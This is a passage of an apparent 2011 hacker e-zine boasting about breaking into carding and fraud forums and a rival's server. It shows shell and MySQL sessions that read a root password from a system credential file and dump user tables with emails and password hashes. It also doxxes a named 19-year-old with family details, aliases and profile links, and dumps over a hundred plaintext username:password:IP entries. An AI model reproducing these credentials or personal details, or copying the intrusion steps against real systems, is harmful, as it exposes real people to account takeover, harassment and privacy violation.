0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180256065317802 a _ d r mmgen ftp 0 * c +Thu Jan 27 23:14:04 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ o r mmgen ftp 0 * c +Thu Jan 27 23:14:07 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ o r mmgen ftp 0 * c +Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ d r mmgen ftp 0 * c +Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ d r mmgen ftp 0 * c + +78.42.186.98 resolves to Kabel Baden-Wuerttemberg GmbH & Co. KG, +Muellheim in Germany. Looks like someone did not constantly use a +proxy. Means you are officially + . + / \ + | | + |.| PWNED LOL! + |.| / + |:| __ / +,_|:|_, / ) + (Oo / _I_ + +\ \ || __| + \ \||___| + \ /.:.\-\ + |.:. /-----\ + |___|::pwn::| + / |:<_T_>:| + |_____\ ::: / + | | \ \:/ + | | | | + \ / | \___ + / | \_____\ + +Alright people let's keep the show going with El-Basar.biz ... + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========{ El-Basar.biz }=======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Searching for "El-Bazar.biz" on google gives a +,;' \ /-(.;, ) good impression of what's being sold there. You + ) / ) / can buy one week of DDOS to take down one web- + // || site for 250 Euros. You get 10 US CCs without + )_\ )_\ DOB (date of birth) for 5 Euros. And you can even +buy 50g of MDMA crystals for 2000 Euros. Hilarious! El-Basar is being +run by some guy called Ganymedes and was hosted on the same server as +St0re.cc. However it seems like Ganymedes has moved his shop to +another location which sadly has not been backdoored by us so far and +thus will not make it into this issue of our ezine. Notwithstanding he +left enough data on his old box, but we must say, Ganymedes, if you +don't take down your store, we will be so kind and do that for you +sooner or later. Thanks. + +# pwd +/home + +# ls -la +total 116 +drwx--x--x 28 root wheel 1024 Sep 14 17:31 . +drwx--x--x 18 root wheel 512 Apr 12 19:59 .. +drwxrwx--- 13 alg www 1024 Feb 19 2011 alg +drwxr-x--- 4 ayoga www 512 Apr 23 2009 ayoga +drwxr-x--- 5 crank2010 www 512 Dec 27 2009 crank2010 +drwxr-x--- 4 exchanger www 512 Mar 31 2010 exchanger +drwxr-x--- 6 filip www 512 Jul 16 2010 filip +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ganymedes +drwxr-x--- 6 garf www 512 Apr 16 02:26 garf +drwxr-x--- 4 lordknight www 512 Jan 3 2010 lordknight +drwxr-x--- 4 madrage www 512 Jan 10 2010 madrage +drwxrwxr-x 5 margosha www 512 Sep 8 16:22 margosha +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 mmgen +drwxr-x--- 9 mr101 www 512 Apr 7 2010 mr101 +drwxr-x--- 4 msk www 512 May 20 2009 msk +drwxr-x--- 4 muraaat www 512 Aug 29 20:59 muraaat +drwxr-x--- 7 nukeuploads www 512 Dec 2 2009 nukeuploads +drwxr-x--- 8 onlineschauen www 512 Oct 1 23:57 onlineschauen +drwxr-x--- 4 pavlrse www 512 Aug 21 03:32 pavlrse +drwxr-x--- 8 propiska www 512 Nov 19 2010 propiska +drwxr-x--- 5 scenehack www 512 Feb 22 2010 scenehack +drwxr-x--- 4 snetwork www 512 Jul 14 22:01 snetwork +drwxr-x--- 5 szenevz www 512 Mar 11 2010 szenevz +drwxr-x--- 2 test4me www 512 Sep 2 01:39 test4me +drwxr-x--- 4 thefuelru www 512 Jan 22 2010 thefuelru +drwxr-x--- 4 useresu www 512 Aug 19 11:27 useresu +drwxr-x--- 4 useresu1 www 3584 Aug 19 11:47 useresu1 +drwxrwxr-x 6 vestacomp www 512 Dec 20 2010 vestacomp + +# cd ganymedes + +# ls -la +total 1180 +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 . +drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. +-rw------- 1 root www 520192 Oct 5 21:43 bash.core +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 el-basar.biz +drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 newsportal24.net +drwxrwx--- 2 ganymedes www 53760 Oct 6 00:38 temp + +# cd newsportal24.net + +# ls -la +total 388 +drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 . +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. +-rw-r--r-- 1 ganymedes www 397 Sep 27 18:24 index.php +-rw-r--r-- 1 ganymedes www 16572 Sep 27 18:24 license.txt +drwxr-xr-x 2 ganymedes www 512 Sep 29 00:50 test +-rw-r--r-- 1 ganymedes www 4343 Sep 27 18:24 wp-activate.php +drwxr-xr-x 9 ganymedes www 2560 Sep 27 18:25 wp-admin +-rw-r--r-- 1 ganymedes www 40243 Sep 27 18:24 wp-app.php +-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-atom.php +-rw-r--r-- 1 ganymedes www 274 Sep 27 18:24 wp-blog-header.php +-rw-r--r-- 1 ganymedes www 3931 Sep 27 18:24 wp-comments-post.php +-rw-r--r-- 1 ganymedes www 244 Sep 27 18:24 wp-commentsrss2.php +-rw-r--r-- 1 ganymedes www 3577 Sep 27 18:24 wp-config-sample.php +-rw-rw-rw- 1 www www 3896 Sep 27 18:33 wp-config.php +drwxr-xr-x 6 ganymedes www 512 Sep 27 18:40 wp-content +-rw-r--r-- 1 ganymedes www 1255 Sep 27 18:24 wp-cron.php +-rw-r--r-- 1 ganymedes www 246 Sep 27 18:24 wp-feed.php +drwxr-xr-x 8 ganymedes www 2560 Sep 27 18:26 wp-includes +-rw-r--r-- 1 ganymedes www 1997 Sep 27 18:24 wp-links-opml.php +-rw-r--r-- 1 ganymedes www 2618 Sep 27 18:24 wp-load.php +-rw-r--r-- 1 ganymedes www 27601 Sep 27 18:24 wp-login.php +-rw-r--r-- 1 ganymedes www 7774 Sep 27 18:24 wp-mail.php +-rw-r--r-- 1 ganymedes www 494 Sep 27 18:24 wp-pass.php +-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rdf.php +-rw-r--r-- 1 ganymedes www 334 Sep 27 18:24 wp-register.php +-rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rss.php +-rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-rss2.php +-rw-r--r-- 1 ganymedes www 9839 Sep 27 18:24 wp-settings.php +-rw-r--r-- 1 ganymedes www 18646 Sep 27 18:24 wp-signup.php +-rw-r--r-- 1 ganymedes www 3702 Sep 27 18:24 wp-trackback.php +-rw-r--r-- 1 ganymedes www 3266 Sep 27 18:24 xmlrpc.php + +# cat wp-config.php +_irty|#bG+hp@Qj6%qo.-N d.ZnGC=f@`m'); +define('AUTH_SALT', 'T|#(IjI)JW%66G(e2S}$k-8/QY.iEfl^/v}PWgtk$@cnw9d)N pAm4A,A.~f+x_Hc}V^Wi${iO%`$FJb8%~W?$|*l{%$+cK2.{A*ZNW>)~Ht0r,p B[3('); +define('LOGGED_IN_SALT', 'n[Un&54kqxFw|!d]ccfCV5ajNklT`YN/YECk (K2}T{;,0,*!|)ru}/ysPG s$v-'); +define('NONCE_SALT', 'cm$vLkM34?(0u}&O)SOp>qCRZq*LJY``ym%-tNFg+MQ^#L{x~@c,d@fCJ27{;d~8'); + +/**#@-*/ + +/** + * WordPress Datenbanktabellen-Präfix + * + * Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank + * verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte! + */ +$table_prefix = 'wp_news'; + +/** + * WordPress Sprachdatei + * + * Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende + * Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo + * Wenn du nichts einträgst, wird Englisch genommen. + */ +define('WPLANG', 'de_DE'); + +/** + * For developers: WordPress debugging mode. + * + * Change this to true to enable the display of notices during development. + * It is strongly recommended that plugin and theme developers use WP_DEBUG + * in their development environments. + */ +define('WP_DEBUG', false); + +/* That's all, stop editing! Happy blogging. */ + +/** Absolute path to the WordPress directory. */ +if ( !defined('ABSPATH') ) + define('ABSPATH', dirname(__FILE__) . '/'); + +/** Sets up WordPress vars and included files. */ +require_once(ABSPATH . 'wp-settings.php'); + +# cd .. + +# cd el-basar.biz + +# ls -laR +total 12 +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 . +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 85c91o822x3olps1d8179xizbm27 + +./85c91o822x3olps1d8179xizbm27: +total 12 +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 .. +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 check + +./85c91o822x3olps1d8179xizbm27/check: +total 20 +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. +drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 vp2q910pxc2ifo091y + +./85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y: +total 16 +drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 . +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. +-rw-r--r-- 1 www www 0 Aug 11 01:55 6337180250025522924 +-rw-r--r-- 1 www www 0 Aug 9 19:04 6337180250037669499 +... + +# Nothing left here anymore :(^C +# Better check the database ... + +# cat /etc/my.passwd +bde413a2c8751ac97887f11d6efb2c39 + +# mysql -u root -pbde413a2c8751ac97887f11d6efb2c39 +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 205220 +Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a + +Type 'help;' or '\h' for help. Type '\c' to clear the buffer. + +mysql> SHOW DATABASES; ++--------------------+ +| Database | ++--------------------+ +| information_schema | +| alg_forum | +| alg_hide | +| alg_zzz | +| crank2010_forum | +| crimecore_board | +| exchanger_db | +| filip_eldent | +| filip_eldent_ | +| ganymedes_bosscc | +| ganymedes_bossm | +| garf_ban | +| hcgcrew?forum | +| jeka-test_ | +| lordknight_forum | +| lordknight_teon | +| madrage_wbb | +| margosha_forum | +| margosha_sait | +| mmgen_3 | +| mmgen_ref | +| mmgen_shop | +| mr101_old | +| mr101_w3 | +| muraaat_mybb | +| mysql | +| onlineschauen_bi | +| onlineschauen_ho | +| onlineschauen_ma | +| onlineschauen_on | +| onlineschauen_se | +| pavlrse_xshop | +| propiska_gr | +| propiska_us | +| propiska_work | +| scenehack_board | +| snetwork_4g741 | +| snetwork_sh24op | +| szenevz_123 | +| szenevz_db | +| test | +| test4me_db | +| thefuelru_pp | +| useresu1_prava | +| useresu_bollist | +| vsocks_vsocks69 | +| vsocks_vsocks69_ | +| vsocks_vsocks69_a | ++--------------------+ +48 rows in set (0.00 sec) + +mysql> USE ganymedes_bosscc; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> SHOW TABLES; ++----------------------------+ +| Tables_in_ganymedes_bosscc | ++----------------------------+ +| admin_navi | +| navi_de | +| news | +| produkt_gruppen | +| produkt_items | +| produkte | +| psc | +| support | +| supporter | +| supporter_group | +| ukash | +| users | ++----------------------------+ +12 rows in set (0.00 sec) + +mysql> SELECT count(*), sum(guthaben) FROM psc; ++----------+---------------+ +| count(*) | sum(guthaben) | ++----------+---------------+ +| 74 | 1080 | ++----------+---------------+ +1 row in set (0.00 sec) + +mysql> # Not bad ... + +mysql> SELECT count(*) FROM users; ++----------+ +| count(*) | ++----------+ +| 1359 | ++----------+ +1 row in set (0.00 sec) + +mysql> SELECT * FROM users WHERE guthaben > 1; ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +| id | username | pass | email | reason | guthaben | access | ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +| 1 | blamedyy | ==44c8cf514440543c728bee1864a1a466 | blamedyy@yahoo.com | | 897 | 1 | +| 474 | hung2304 | ==2864d82ad1e49fffcafe85976c602868 | jidar@hotmail.de | faked psc | 8 | 33 | +| 485 | SlamD | ==65259faf801899cfd1f27b389b8849ac | arx2@gmx.net | | 3 | 0 | +| 555 | AEQUITAS | ==ee61e9fd8caafb735406838f18235281 | aequitas@z1p.biz | | 3 | 0 | +| 618 | Jettic | ==a1eba8157beb255a503e8b586e141b61 | jettic@mail.ru | | 3 | 0 | +| 634 | me2 | ==cfbf7976666e981d217cfed255d7db6e | fff8756@yahoo.de | | 3 | 0 | +| 640 | riddick | ==24217c603630ce2339503db1d009b8c7 | riddicker1@web.de | | 3 | 0 | +| 817 | Hilli | ==8e6a108a6555e604f9f652d679c7ab29 | shiva166@web.de | | 2 | 0 | +| 865 | killersm | ==6b8daaab17c40f5fbf9aab0db8dc21bf | jhir@jire.de | | 3 | 0 | +| 875 | skilled | ==195b9d5a1e7d2ef7237eb467533ec1f2 | sk@sk.com | | 3 | 0 | +| 943 | FatJoe | ==ed35e0bc4b6a22cd24f74e039533276f | sedaephi@emailgo.de | | 2 | 0 | +| 963 | Bogner | ==b3a0ad39806aced9241a80b9a11868e4 | placebo84@hotmail.de | | 3 | 0 | +| 971 | keks | ==572330601360f7945006cae2ea549bab | aggroberliner222@web | | 3 | 0 | +| 975 | saidone | ==aba11e56813d842283854c6ccccbef60 | saytec@gmx.de | | 3 | 0 | +| 1022 | lczero | ==37d1475d60b2c99b1c222a5a5acc2c58 | sdpfmodpmgg@web.de | | 3 | 0 | +| 1094 | peterpan | ==fdc6b6d13338d1b9f1099dcec97cb2a8 | tfmpp1@web.de | | 3 | 0 | +| 1261 | Tommy | ==7d01922eeaeb9682953c49fd20ece458 | tomdanger@rbcmail.ru | | 3 | 0 | +| 1443 | 2345176 | ==9ddfac889552a0cdf635e46c8c70b01b | b2121870@prtnx.com | | 3 | 0 | +| 1466 | badboy44 | ==3fa46350e1a9aa6f09a32cb342eb8c31 | anja_ludi@web.de | | 3 | 0 | +| 1484 | delphin | ==7b8d81c371ada9fd93a448c7ac45b346 | asdgasd@asdga.de | | 3 | 0 | +| 1494 | booom | ==ee6c8e07eed464a4842c2335b4977309 | jhghj@gggh.de | | 3 | 0 | +| 1512 | tetrispr | ==1e63fa4217770660acccbcf4acabfc67 | tatakiru@gmx.de | | 3 | 0 | +| 1513 | stage6 | ==660d11767f02a3a7403bfe47954de520 | carders@hotmail.de | | 3 | 0 | +| 1586 | m1sc | ==1d28ce4b9ff02e4a08432036f7316db1 | m1sc@gmx.de | | 3 | 0 | +| 1619 | anubis | ==dda9ab9768f7367198227e69b83cedbd | xAnuBiSx@gmx.de | | 3 | 0 | +| 1671 | carlos | ==2a363b531b95578a7d816dd02cde60d6 | carlos---@live.de | | 3 | 0 | +| 1715 | advanced | ==924f32ec3a868e5555ee1910d4242ce1 | advanced@gnx.de | | 3 | 0 | +| 1719 | Blizzard | ==74281aac5624b24fb3472feab558a5d1 | kgadkhagj@spambob.de | | 2 | 0 | +| 1735 | ripit | ==eed34671e873f2aa07d30d878f182ce0 | ripit@mailinator.com | | 3 | 0 | ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +29 rows in set (0.00 sec) + +mysql> Aborted + +There we got one of Ganymedes' other accountnames and his email: +blamedyy@yahoo.com. We better check out some proftpd logs. Ganymedes +constantly used proxies, but there is one login sequence where he did +not: + +# grep 93.232.*ganymedes proftpd-transfer.log +Mon Jan 24 15:34:21 2011 0 212.117.174.26 0 /home/ganymedes/el-basar.biz/85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y/6337180258293023293 a _ d r ganymedes ftp 0 * c +Mon Feb 07 02:04:40 2011 0 93.232.193.137 2416 /home/ganymedes/el-basar.biz/designe/design/navi.php a _ o r ganymedes ftp 0 * c +Mon Feb 07 02:04:45 2011 0 93.232.193.137 1709 /home/ganymedes/el-basar.biz/designe/design/title_gh.php a _ o r ganymedes ftp 0 * c +Mon Feb 07 02:09:23 2011 0 93.232.193.137 1917 /home/ganymedes/el-basar.biz/co2xcpqwlvxmi/config.php a _ o r ganymedes ftp 0 * c + +Deutsche Telekom AG, NRW, Germany. Well done kid. + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------==={ The Happy Ninja Faker }===))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Some of you guys might have noticed that a ~ | ||( );, +"HappyNinjas" Twitter account has been created ( ,;.)-\ / ';, +on the 4th or 5th February 2011 which seemed \ ( \ ( +to offer the opportunity to receive the latest || \\ +news regarding our actions. As we observed this /_( /_( +account got some attention and even obtained nearly 100 followers. +Hurray. However it isn't ours :( To get more publicity the creator +also published a fake zine called exp04.txt at +http://www.pva-apeldoorn.nl/exp04/exp04.txt. It was very clear that +the person didn't do this to help us or fight the fraudscene, but to +spread lies. So we did the only logical thing: We hacked that server +too, removed the fake and copied some logs. Here are some excerpts: + +2011-02-10 16:19:24 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04 - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.13 - - 301 + 0 0 370 399 500 +2011-02-10 16:19:26 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/index.html - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6 +.13 - - 200 0 0 316 400 687 +2011-02-10 16:58:53 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/exp04.txt - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6. +13 - http://twitter.com/ 304 0 0 236 527 296 + +Whups, looks like someone did a messy job there. Well, at least he +used a proxy. But after some black magic we also hacked the proxy and +it showed us the right way to payback. So who did this lousy job, you +may ask? Noone else but 3lite aka InVisible, (former) moderator and +admin of several fraud orientated message boards. It wasn't hard to +find more information about him, right Robin? + +To understand why someone would do such things we first have to +understand who he is. Robin is 19 years old and comes from a typical +middle class family. Both parents are employed, the father as an +administrative official, the mother as an industrial clerk. He also +has three sibs. His family consists of baptists (a crazy sect, calm +but annoying), thus it is not really surprising that his mother also +spends way too much money on esoteric medicine. I guess if you can +believe in the biblical history of creation you can believe in +anything. His education started at the grammar school (Gymnasium) in +2002. After two wasted years he switched to middle school +(Realschule). Three years later he had to switch again, this time to +secondary modern school (Hauptschule). The story of his life. This +year he finished technical college (Berufsfachschule) with a rather +bad grade. In his virtual life he mostly works with botsoftware, +infects people and sells the stolen data to other fraudsters. In other +words: he is a trojan skiddy. Sounds like a bored, unmotivated child +without much talent and that is exactly what he is. + +He used more than ten different nicknames in the past, because after a +while they all had a very bad reputation. And that are only the names +we know about, there are probably more. + + _ _____________________ _ + | | | | + |b| Deoxys |b| + |o| Aerodactyl |o| + , |x| Raid0n17 |x| + (@| | | DeoOxygen | | + ,, ,)|_____|o| ExplosiV / ExplOsiv |o|_______ +//\\8@8@8@8@8@8 / _ _ |f| Androx |f| _ _ _ \ +\\//8@8@8@8@8@8 \_____| | 3lite / 3lite2k11 | |_______/ + `` `)| |s| Raiden |s| + (@| |h| »InVisible |h| + |a| R@ven |a| + |m| Fr33w4re |m| + |e| VexX |e| + |_|_____________________|_| + +If you want to check him out yourself, here are some links. More +information can be found in the attached files. + +http://www.youtube.com/Raid0n17 +http://www.youtube.com/DeoOxygen +http://aerodactyl.wordpress.com/ +http://steamcommunity.com/profiles/76561197968670011 + +He loves to use variations of "1337" and "troll" as his passwords. +Very secure, you should give it a try. + +Our conclusion: This guy is really fucked up. He is a pathological +liar, a deadbeat, a scammer. Avoid him if you can. + +Side note: The following two texts have already been published by us, +because the given circumstances forced us to in that time. Since both +texts have not made it into an "official" ezine yet, we decided to +print them here. Have fun! + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((======={ Swissfaking.net }=====------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Swissfaking.net has not been in the center of +,;' \ /-(.;, ) our interest for long, mainly because one doesn't + ) / ) / hear a lot about it. From the outside they just + // || seem to be a small board, not any worse than + )_\ )_\ the average kiddyforums. +However, when looking at it closely, one notices that swissfaking +manages to fully compensate for their size with the most shrewd users. +These peoples' only interest seems to make money. Lots. Fast. No +matter what. Swissfaking consider themselves a very special community; +that's why the registration has been closed since 2009 and replaced by +an invite system. Under these circumstances one would not expect great +activity in the forums, though as we first logged in, we were +bombarded with piles of blinking flash ads. The most ridiculous one +was probably that of some fag selling credit cards. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| d3adline: | +| You want buy without any risks? You want fast car? You want hot | +| girls? You want have glamorous partys? Then buy ccs from d3adline | +|____________________________________________________________________| + +This again shows pretty well how ignorant those fucks are; as if a +credit card brought you from mom's basement to high life. Just because +the majority of swissfaking's users probably suffer from the same +mental disease as the mister quoted above, we have prepared a +treatment, but wait, before we start, here are Username:plain +password:IP:logintime of almost all users: + +p5n:@Copy10cv:91.89.69.182:January 2, 2011, 9:24 pm +mcdrive:belinea:188.23.69.210:January 2, 2011, 11:19 pm +n3ro:LbiI:{mq>K kZäj`,}} :213.232.200.177:January 3, 2011, 7:30 pm +pandora:nokia6280:84.61.88.65:January 2, 2011, 10:36 pm +fenriz187:gelomyrtol:92.225.202.186:January 6, 2011, 8:09 pm +tezeewood:26nu4uku26nu4uku$:109.91.113.26:January 2, 2011, 9:16 pm +china:§k$vf@n1:81.210.136.47:January 2, 2011, 11:54 pm +ibrains:qw2io0pl:46.115.102.70:January 2, 2011, 9:29 pm +rox:rox24255:80.122.42.30:January 3, 2011, 11:45 pm +slash:keinproblem15:83.135.112.150:January 3, 2011, 1:21 am +punisher:youtube26:85.180.135.133:January 2, 2011, 11:27 pm +lolboter:EsPZLtQa2x=9Mf@I:80.171.11.252:January 5, 2011, 11:55 pm +fasti1001:lasterraster:77.20.136.173:January 4, 2011, 11:22 am +d0pz:lollollol123miregal95:213.163.64.43:January 2, 2011, 11:48 pm +tolja:fujitsusiemens22:91.61.147.49:January 2, 2011, 11:55 pm +solt:lolgolol:95.143.192.159:January 2, 2011, 9:09 pm +beex:ab1cd2:91.89.190.46:January 2, 2011, 9:56 pm +pimperich:M1YgRgXB:79.228.118.129:January 3, 2011, 10:28 am +curly:Eminem:79.193.89.45:January 2, 2011, 10:10 pm +jasmin75:yId69xqsmBve:87.150.137.16:January 2, 2011, 9:29 pm +justmike:t3xxe33:84.168.231.191:January 2, 2011, 10:10 pm +du3en:kjxxdj13:92.73.69.139:January 2, 2011, 11:00 pm +dr.bob:Swissfaking2011:84.61.238.224:January 2, 2011, 10:13 pm +prototype:matrix:46.126.244.198:January 3, 2011, 2:13 am +winkelmann72:jonaskiessling:89.208.35.190:January 2, 2011, 10:03 pm +tollik:audi80:93.205.10.77:January 2, 2011, 9:43 pm +cybi0nic:67k57eiSswissfaking:93.182.171.109:January 3, 2011, 4:10 pm +wuschi:fetterJaxel:82.83.42.21:January 3, 2011, 8:26 am +juan:55555:217.23.6.162:January 3, 2011, 6:24 pm +fusselpo:schatz11:77.22.240.27:January 4, 2011, 10:00 pm +nomercy:ymZZIFIF0nCZZ$BW:62.143.126.35:January 2, 2011, 9:26 pm +jamyla:2wsx6zhn:93.217.241.134:January 6, 2011, 5:33 pm +nemiz:2z3545:94.220.79.39:January 4, 2011, 11:47 pm +theird21:kmk00025879:217.88.114.20:January 2, 2011, 11:11 pm +corvu5:corvu54swissfaking:95.222.116.238:January 2, 2011, 10:13 pm +s0xtech:s0xy0000:217.231.252.159:January 2, 2011, 9:39 pm +speedygamer:Nzhdtlcwb1:89.149.242.16:January 3, 2011, 12:39 am +die-wiese:Ventura83:188.193.8.225:January 3, 2011, 12:47 pm +goldrock:56&6ght$$!awwEfb:62.167.138.232:January 2, 2011, 10:48 pm +devilboy:pelubo62:87.106.94.167:January 4, 2011, 3:04 pm +fam0us:ichliebedich1:92.241.168.24:January 2, 2011, 10:49 pm +ares:mmmmmmmmm:80.108.172.227:January 5, 2011, 9:48 pm +imer:misakifan:93.217.127.220:January 2, 2011, 9:48 pm +secdaking:$p!tT3r2k!0:79.211.101.154:January 3, 2011, 12:36 am +seriousman:regen@44:79.203.222.236:January 2, 2011, 11:08 pm +mpcool:famous:77.183.227.158:January 3, 2011, 5:13 pm +sine:ninaninabekim:79.197.201.62:January 2, 2011, 10:14 pm +famous:aLq3lm$%:92.241.190.253:January 2, 2011, 10:29 pm +psych0:achtzehn32:79.204.163.237:January 3, 2011, 3:41 pm +trickz:crazyfrog1234:87.118.118.37:January 2, 2011, 9:27 pm +pseudo:hackedbypseudo:78.48.103.103:January 2, 2011, 9:45 pm +n00be:kjvhjvhjhvmvh:92.241.190.253:January 2, 2011, 10:11 pm +txto:123456:88.67.188.148:January 3, 2011, 2:17 am +mehmet111:hahaka:66.90.73.223:January 3, 2011, 4:28 am +daemon:weed1337:84.149.94.90:January 3, 2011, 6:45 pm +sugar:xip6hexi0:217.91.210.243:January 4, 2011, 9:12 am +dextrose:.l33rlauf:92.241.168.90:January 2, 2011, 11:04 pm +weareone:Ichwurdeam23.07.1994geboren.:212.117.174.26:January 2, 2011, 9:49 pm +fatalerror:pulamea18:88.117.121.105:January 4, 2011, 2:39 pm +devolo:PT1346798522!:93.130.53.175:January 2, 2011, 10:14 pm +lestat:123456:79.236.62.169:January 3, 2011, 4:30 pm +zahlenpilz:hacksector:92.77.4.189:January 3, 2011, 9:33 pm +ivenom:1337s!lenTxD:87.143.216.239:January 2, 2011, 9:45 pm +stegen:daniel:188.194.83.146:January 6, 2011, 4:54 pm +ch4in:1384gwm123:217.187.138.90:January 3, 2011, 12:14 am +hesgoodboy:01724186115:217.114.211.242:January 3, 2011, 1:30 pm +michi:äöüäöü:91.42.237.242:January 2, 2011, 9:14 pm +lazarus:Google123:85.178.160.144:January 2, 2011, 9:30 pm +paran0id:bravsobrav:212.117.160.22:January 2, 2011, 9:01 pm +simul4nt:comnoboat:109.192.198.159:January 3, 2011, 12:23 am +dicethrower:12wue345rfe6l:212.23.103.26:January 3, 2011, 2:35 pm +raydo:h3llboy:93.208.239.102:January 4, 2011, 12:04 am +janus:vladimir:92.107.113.49:January 2, 2011, 10:49 pm +crankrex:monohydrat:95.89.188.29:January 3, 2011, 7:17 pm +paradox:BTYM8h:92.241.168.90:January 2, 2011, 9:25 pm +bluehero:1qay2wsx:84.138.178.123:January 2, 2011, 11:50 pm +nobody:pagewrapper:83.170.114.16:January 6, 2011, 12:06 am +freakout:Ghana11:178.200.60.53:January 4, 2011, 10:35 pm +loop:1337loopi:78.48.162.155:January 4, 2011, 9:44 am +phr34kz:UX3eXfSzZ5q7N0{:212.117.162.222:January 2, 2011, 9:19 pm +hoodstar:lieblingssarah271994:78.50.94.114:January 4, 2011, 12:45 am +alphahack:alphahack:188.108.81.215:January 3, 2011, 11:59 pm +silence:8530ch:91.65.94.151:January 2, 2011, 9:16 pm +christian:123456:78.42.172.154:January 2, 2011, 10:05 pm +batonde:gDHoCJHG-6*Ae1Lj:88.73.87.81:January 6, 2011, 7:38 pm +jokereloaded:stefan1337!:217.225.87.229:January 3, 2011, 11:22 am +oneone1:BVBBERKY212:91.33.186.9:January 3, 2011, 3:34 pm +vodka:159ZAYCXS792QUALIAdRO//:217.255.207.169:January 2, 2011, 9:25 pm +killermouse:kiffer:78.55.117.164:January 3, 2011, 11:26 pm +run.:duschlampen!1:79.194.93.91:January 3, 2011, 9:45 pm +1337_reaction:1002003000:92.241.165.69:January 2, 2011, 9:55 pm +king6545:Soh2vebo333:178.203.138.49:January 4, 2011, 11:31 pm +basics:nicki123!:91.67.60.117:January 2, 2011, 9:03 pm +deco:julian08:178.202.239.33:January 2, 2011, 9:38 pm +ricardiazz:swissfaking:89.13.14.5:January 2, 2011, 9:16 pm +delax:hackerfun:188.193.194.86:January 2, 2011, 9:11 pm +jamesfb:fenerbahce:94.221.91.129:January 2, 2011, 10:43 pm +icebox87:apfel23:79.253.148.110:January 3, 2011, 1:50 pm +tryit:187lalalala187#:88.70.196.173:January 2, 2011, 11:46 pm +mrk:422mark646:62.178.8.56:January 3, 2011, 12:43 am +peter_pan:2bon2b:62.143.149.223:January 6, 2011, 9:33 am +tweaknap:%$HD1337PS$%:178.142.84.178:January 3, 2011, 12:11 am +nokz:aufleg0rn:92.227.68.28:January 3, 2011, 8:33 am +shoxx:g07091992:92.74.162.228:January 3, 2011, 4:34 pm +edgeee:za32qt4s.:80.201.55.194:January 3, 2011, 2:15 pm +w.t.f.:lol123:217.226.243.83:January 3, 2011, 11:06 pm +d3rd0n:12cocsli:93.217.26.178:January 3, 2011, 2:52 am +sp33djunkie:17331733:212.117.162.222:January 2, 2011, 9:24 pm +infomailer:9ö7&4k.ü_ä VmSH.NmwD:77.23.8.178:January 2, 2011, 10:01 pm +nesia:Nummer13Lebt!!!:82.82.167.173:January 4, 2011, 11:13 am +nyuu:123456789:87.122.143.30:January 2, 2011, 10:03 pm +selix:Bitrate187:188.192.238.47:January 3, 2011, 12:09 pm +smithz:Sarah1988:92.241.190.253:January 3, 2011, 1:40 am 